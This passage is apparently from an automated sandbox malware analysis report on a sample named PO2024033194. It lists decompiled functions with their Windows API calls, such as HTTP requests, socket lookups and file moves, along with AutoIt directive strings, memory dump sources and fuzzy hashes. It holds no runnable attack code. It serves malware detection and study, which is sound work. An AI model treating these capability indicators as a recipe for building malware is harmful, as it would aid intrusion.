                                                                  Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                  • String ID:
                                                                  • API String ID: 1291720006-3916222277
                                                                  • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                  • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                  • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                  • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                  Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                  • IsMenu.USER32(?), ref: 0045FC5F
                                                                  • CreatePopupMenu.USER32 ref: 0045FC97
                                                                  • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                  • String ID: 0$2
                                                                  • API String ID: 93392585-3793063076
                                                                  • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                  • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                  • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                  • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                  Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                  • VariantClear.OLEAUT32(?), ref: 00435320
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                  • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                  • String ID: crts
                                                                  • API String ID: 586820018-3724388283
                                                                  • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                  • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                  • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                  • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                  Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                  • _wcscat.LIBCMT ref: 0044BCAF
                                                                  • _wcslen.LIBCMT ref: 0044BCBB
                                                                  • _wcslen.LIBCMT ref: 0044BCD1
                                                                  • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                  • String ID: \*.*
                                                                  • API String ID: 2326526234-1173974218
                                                                  • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                  • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                  • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                  • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                  Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                  • _wcslen.LIBCMT ref: 004335F2
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                  • GetLastError.KERNEL32 ref: 0043362B
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                  • _wcsrchr.LIBCMT ref: 00433666
                                                                    • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                  • String ID: \
                                                                  • API String ID: 321622961-2967466578
                                                                  • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                  • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                  • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                  • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                  Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                  • API String ID: 1038674560-2734436370
                                                                  • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                  • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                  • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                  • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                  Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                  • LoadStringW.USER32(00000000), ref: 00434060
                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                  • LoadStringW.USER32(00000000), ref: 00434078
                                                                  • _wprintf.LIBCMT ref: 004340A1
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                  Strings
                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                  • API String ID: 3648134473-3128320259
                                                                  • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                  • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                  • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                  • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                  Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                  • __lock.LIBCMT ref: 00417981
                                                                    • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                    • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                    • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                  • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                  • __lock.LIBCMT ref: 004179A2
                                                                  • ___addlocaleref.LIBCMT ref: 004179C0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                  • String ID: KERNEL32.DLL$pI
                                                                  • API String ID: 637971194-197072765
                                                                  • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                  • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                  • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                  • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                  Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$_malloc
                                                                  • String ID:
                                                                  • API String ID: 1938898002-0
                                                                  • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                  • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                  • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                  • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                  Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                  • _memmove.LIBCMT ref: 0044B555
                                                                  • _memmove.LIBCMT ref: 0044B578
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                  • String ID:
                                                                  • API String ID: 2737351978-0
                                                                  • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                  • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                  • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                  • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                  Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                  • __calloc_crt.LIBCMT ref: 00415246
                                                                  • __getptd.LIBCMT ref: 00415253
                                                                  • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                  • _free.LIBCMT ref: 0041529E
                                                                  • __dosmaperr.LIBCMT ref: 004152A9
                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                  • String ID:
                                                                  • API String ID: 3638380555-0
                                                                  • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                  • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                  • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                  • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                  Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Copy$ClearErrorInitLast
                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                  • API String ID: 3207048006-625585964
                                                                  • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                  • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                  • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                  • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                  Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                    • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                  • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                  • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                  • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                  • _memmove.LIBCMT ref: 004656CA
                                                                  • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                  • WSACleanup.WSOCK32 ref: 00465762
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
